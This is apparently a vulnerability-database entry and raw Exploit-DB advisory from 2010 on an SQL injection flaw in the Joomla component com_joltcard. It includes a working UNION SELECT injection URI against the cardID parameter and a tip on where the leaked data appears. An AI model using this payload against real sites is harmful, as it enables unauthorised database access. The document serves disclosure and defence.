Joomla Component com_joltcard SQL Injection Vulnerability

vendor:

com_joltcard

by:

Valentin Hoebel

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: com_joltcard

Affected Version From: unknown

Affected Version To: unknown

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_joltcard SQL Injection Vulnerability

The vulnerability exists in the com_joltcard component of Joomla. The vulnerable parameter is cardID. An example URI is index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--. Selected information gets only displayed within the HTML source code (look at <OBJECT> tag).

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability
# Date: 17.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on: 
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information 
|:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability
|:: Author = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_joltcard
|:: Vendor = JOLT media
|:: Vendor Website = http://jolt.ca/
|:: Affected Version(s) = unknown
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Vulnerable Parameter(s) = cardID
|:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--
|:: Selected information gets only displayed within the HTML source code (look at <OBJECT> tag). 
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 17.04.2010
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]